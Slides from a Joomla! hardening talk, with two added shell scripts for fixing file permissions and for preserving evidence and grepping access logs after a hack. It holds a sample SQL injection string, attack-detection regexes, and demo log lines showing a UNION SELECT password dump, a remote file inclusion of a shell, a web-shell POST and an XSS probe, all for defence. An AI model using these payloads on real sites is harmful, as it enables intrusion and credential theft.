Hidden Secrets For A Hack-Proof Joomla! Site
HIDDEN SECRETS FOR A HACK-PROOF JOOMLA!
Daniel Kanchev @dvkanchev
BEFORE WE BEGIN …
✓ 7+ Years Of Joomla! Experience
✓ 6 Years With SiteGround
✓ Love Travelling The World
✓ Addicted To Extreme Sports
WHO SHOULD CARE ABOUT SECURITY?
✓ Application/Extension Developers
✓ Hosting Providers/System Administrators
✓ YOU (End Joomla! Users)
EVERYONE
WHY SHOULD YOU CARE?
✓ Be Trustworthy By Protecting Your Clients' Data
✓ Have A Healthy Site - Avoid Substantial Data Loss/Downtime
HOW DO HACKERS WORK?
EVERYONE'S RESPONSIBLE!
KEEP CALM, IT'S NOT ROCKET SCIENCE
SECURITY IS A PROCESS!
IS YOUR SERVER SETUP RIGHT?
SERVER CONFIG & TIPS
✓ Always Update Your Server Software
✓ Harden The Linux Kernel - grsecurity
✓ Chroot Processes
✓ Provide Only Restricted Shell Access
✓ Disable/Remove Unused Services
SOLUTIONS: 1H Hive, Better Linux, CloudLinux
PROTECT YOUR WEB SERVER - Web Application Firewall (ModSecurity) Rule Sets
✓ OWASP Core Rule Set - http://goo.gl/rC7Uz
✓ Atomic (Atomicorp) Rules - http://goo.gl/Fv3Vn
✓ Trustwave SpiderLabs Paid Rules - http://goo.gl/9IAaB
PROTECT JOOMLA!
#1: UPDATE EVERYTHING!
SITEGROUND AUTO UPDATES
#2: DO THE BASICS
✓ Change The Default “admin” username
✓ Change The Default “jos_” DB Prefix
✓ Password Protect Your Administrator Folder
#3: RESTRICT THE ADMIN AREA BY IP
✓ Step 1: Check Your IP: whatismyip.com
✓ Step 2: Add This Rule To The .htaccess File Inside Your administrator/ Folder (Apache 2.2 syntax; on Apache 2.4 use "Require ip YOUR_IP_ADDRESS" instead):
    Order Deny,Allow
    Deny from all
    Allow from YOUR_IP_ADDRESS
✓ Caveat: if your IP changes (dynamic IP, travelling) you lock yourself out, so keep FTP/SSH access to edit the file
#4: KEEP PHP SCRIPTS IN THE RIGHT FOLDERS
✓ Folders that only hold data (images/, tmp/, cache/, logs/) should never execute PHP - put this .htaccess in each of them so an uploaded web shell cannot run (Apache 2.2 syntax; on Apache 2.4 use "Require all denied"):
    <Files *.php>
        Deny from all
    </Files>
#5: USE BULLET-PROOF PASSWORDS
✓ Avoid password generators
✓ Don't use common words
✓ Avoid personal info, names and significant dates:
    daniel123
THE PERFECT PASSWORD
✓ Choose A Favourite (Not Famous) Movie Quote/Phrase From A Book:
    We all go a little mad sometimes
✓ Add Punctuation Symbols (?!.,:) And Capital Letters, Remove Whitespace:
    We.all?go!AlittleMad2sometimes
✓ Length matters more than the substitutions: a long phrase nobody else would associate with you beats a short word with a few symbols swapped in
#6: CHECK YOUR EXTENSIONS
✓ Joomla! Vulnerable Extensions List (VEL): http://vel.joomla.org/
✓ National Vulnerability Database: http://web.nvd.nist.gov/view/vuln/search
#7: STAY ON TOP OF SECURITY UPDATES
✓ http://feeds.joomla.org/JoomlaSecurityNews
✓ http://feeds.joomla.org/JoomlaSecurityVulnerableExtensions
#8: FIX YOUR PERMISSIONS AND OWNERSHIP
✓ Folders: 0755
✓ Files: 0644
✓ All files/folders should be owned by your main FTP user
✓ NEVER EVER USE 777 permissions
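The following script is an added example for this slide; it is not part of the talk and not SiteGround or Joomla! code. It applies the 0755/0644 rule to a whole site tree with find, then audits for anything still world-writable (the 777/666 cases) or owned by someone other than the main FTP user. The site root, the expected owner and the throwaway demo tree it builds are assumptions.

```shell
#!/bin/sh
# Added example (not from the talk): normalise a Joomla! tree to 0755 directories
# and 0644 files, then audit for leftovers. Paths and the demo tree are assumptions.

# Step 1: set the recommended modes (directories keep the execute bit so they can be traversed).
fix_permissions() {
    find "$1" -type d -exec chmod 0755 {} +
    find "$1" -type f -exec chmod 0644 {} +
}

# Audit: every path that still has the world-write bit set (777 dirs, 666 files).
list_world_writable() {
    find "$1" ! -type l -perm -002
}

count_world_writable() {
    list_world_writable "$1" | wc -l | tr -d ' '
}

# Audit: paths not owned by the main FTP user (second argument).
list_wrong_owner() {
    find "$1" ! -user "$2"
}

# True when a single path has exactly the given octal mode, e.g. has_mode "$dir" 0755
has_mode() {
    [ -n "$(find "$1" -prune -perm "$2")" ]
}

# Demo on a constructed tree that mimics the usual mistakes (assumed layout).
demo_root="$(mktemp -d)"
mkdir -p "$demo_root/images/stories" "$demo_root/tmp" "$demo_root/cache"
printf '<?php $password = "x";\n' > "$demo_root/configuration.php"
printf 'png' > "$demo_root/images/stories/logo.png"
chmod 0777 "$demo_root/tmp" "$demo_root/cache"   # the "NEVER EVER" case
chmod 0666 "$demo_root/configuration.php"         # DB credentials writable by everyone

before="$(count_world_writable "$demo_root")"
fix_permissions "$demo_root"
after="$(count_world_writable "$demo_root")"
echo "world-writable paths before: $before, after: $after"
list_wrong_owner "$demo_root" "$(id -un)"
```

Run it against the real site as the FTP user, or as root followed by chown -R to that user. configuration.php holds the database password, so many Joomla! administrators tighten it further to 0444 once the site is configured.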
#9: ADDITIONAL PROTECTION THROUGH .htaccess FILE
✓ Remove PHP Sensitive Information (version banners in headers and error pages)
✓ Avoid Visual Fingerprinting
✓ Block Some Popular Tools Used By Hackers (matched on their User-Agent header)
How To Do It: http://is.gd/pGfVXQ
#10: USE JOOMLA! SECURITY EXTENSIONS FOR IDS/IPS
✓ jHackGuard
✓ Akeeba Admin Tools
✓ jomDefender
✓ jSecure
SQL INJECTION
    SELECT * FROM users WHERE name = 'a';DROP TABLE users; SELECT * FROM userinfo WHERE 't' = 't';
The attacker submitted a';DROP TABLE users; SELECT * FROM userinfo WHERE 't' = 't as the "name" value: the quote closes the intended string, and everything after it is executed as extra SQL statements.
jHackGuard SETUP
✓ SQL Injections
✓ Remote URL/File Inclusions
✓ Remote Code Execution
✓ XSS Based Attacks
#11: BACKUP! BACKUP! BACKUP!
NOW WHAT?
DON’T PANIC!
DISASTER RECOVERY PLAN
1. Create A Copy Of The Hacked Site + All Logs
2. Restore From A Clean Backup
3. Quarantine Your Site - Maintenance Mode
4. Check The Logs For The Malicious Code
5. Resolve The Security Issues/Clean Malicious Code
6. Unquarantine Your Site
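Steps 1 and 4 of the plan, as an added example that is not part of the talk: preserve_evidence copies the hacked site and its logs into one checksummed tarball (timestamps kept for a timeline) before anything is restored or cleaned, and scan_log greps an Apache access log for the four attack classes the IDS slide lists plus POSTs to PHP files in upload folders. The paths, the indicator patterns and the sample log lines are constructed assumptions.

```shell
#!/bin/sh
# Added example (not from the talk). Paths, patterns and the log lines are assumptions.

# Step 1: one archive of site + logs, with a SHA-256 so later edits are detectable.
preserve_evidence() {
    site_root="$1"; log_dir="$2"; dest_dir="$3"
    stamp="$(date +%Y%m%d-%H%M%S)"
    stage="$(mktemp -d)"
    mkdir "$stage/site" "$stage/logs"
    cp -Rp "$site_root"/. "$stage/site"   # -p keeps mtimes for the timeline
    cp -Rp "$log_dir"/. "$stage/logs"
    archive="$dest_dir/evidence-$stamp.tar.gz"
    tar -czf "$archive" -C "$stage" .
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$archive" > "$archive.sha256"
    else
        shasum -a 256 "$archive" > "$archive.sha256"
    fi
    rm -rf "$stage"
    echo "$archive"
}

# Step 4: indicators for the attack classes on the IDS slide (assumed patterns, case-insensitive).
SQLI='union(%20|\+| )+(all(%20|\+| )+)?select'
RFI='=https?(://|%3a%2f%2f)'
RCE='base64_decode|eval\(|shell_exec|passthru|system\('
XSS='<script|%3cscript'
WEBSHELL='"POST /(images|tmp|cache|media)/[^" ]*\.php'

scan_log() {
    log="$1"
    for pair in "SQLI:$SQLI" "RFI:$RFI" "RCE:$RCE" "XSS:$XSS" "WEBSHELL:$WEBSHELL"; do
        tag="${pair%%:*}"; pattern="${pair#*:}"
        grep -iE "$pattern" "$log" | sed "s/^/[$tag] /"
    done
}

count_suspicious() {
    grep -ciE "$SQLI|$RFI|$RCE|$XSS|$WEBSHELL" "$1" || true
}

# Constructed demo: a tiny site tree and an access log with four hostile requests.
demo_site="$(mktemp -d)"; demo_logs="$(mktemp -d)"; demo_out="$(mktemp -d)"
printf '<?php $password = "x";\n' > "$demo_site/configuration.php"
cat > "$demo_logs/access_log" <<'EOF'
203.0.113.5 - - [12/Mar/2013:10:01:02 +0000] "GET /index.php?option=com_content&view=article&id=7 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.9 - - [12/Mar/2013:10:02:10 +0000] "GET /index.php?option=com_foo&id=1%20UNION%20SELECT%20username,password%20FROM%20jos_users HTTP/1.1" 200 812 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Mar/2013:10:03:44 +0000] "GET /index.php?option=com_bar&controller=http://203.0.113.200/shell.txt? HTTP/1.1" 200 211 "-" "libwww-perl/5.8"
198.51.100.7 - - [12/Mar/2013:10:04:01 +0000] "POST /images/stories/x.php HTTP/1.1" 200 44 "-" "Mozilla/5.0"
192.0.2.3 - - [12/Mar/2013:10:05:30 +0000] "GET /index.php?search=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 3000 "-" "Mozilla/5.0"
203.0.113.5 - - [12/Mar/2013:10:06:00 +0000] "GET /images/stories/logo.png HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
EOF

evidence="$(preserve_evidence "$demo_site" "$demo_logs" "$demo_out")"
echo "evidence archive: $evidence"
scan_log "$demo_logs/access_log"
echo "suspicious requests: $(count_suspicious "$demo_logs/access_log")"
```

Hits from scan_log give you the source IPs and the exact URLs to search for in the file system (the POST to images/stories/x.php points straight at the dropped shell); the archive is what you hand to the host or keep for later analysis. Grep patterns like these catch the obvious cases only, so treat a clean result as "nothing found", not "nothing happened".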
FEW THINGS TO TAKE AWAY
✓ Security Is About Making It Harder To
Infiltrate - Not Making It Impossible
✓ Security Is An Ongoing Process
✓ Everyone Is Involved
QUESTIONS?
THANK YOU!
Daniel Kanchev @dvkanchev